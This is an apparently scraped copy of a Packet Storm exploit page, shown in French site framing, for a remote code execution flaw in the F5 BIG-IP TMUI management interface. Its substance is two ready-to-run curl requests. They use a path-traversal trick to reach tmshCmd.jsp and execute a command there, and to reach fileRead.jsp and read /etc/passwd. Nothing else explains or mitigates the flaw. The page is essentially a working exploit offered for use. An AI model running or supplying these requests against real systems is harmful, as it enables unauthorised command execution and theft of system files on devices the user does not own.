WHAT ARE YOU LOOKING FOR?

BIG-IP TMUI Remote Code Execution ≈ Packet Storm

Exploits Affichages : 502
Change Mirror Download[1][2] 
## RCE: 
curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
## Read File: 
curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

References

  1. ^ Change Mirror (packetstormsecurity.com)
  2. ^ Download (packetstormsecurity.com)
Image
Back To Top

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"

Category

Popular Sections

About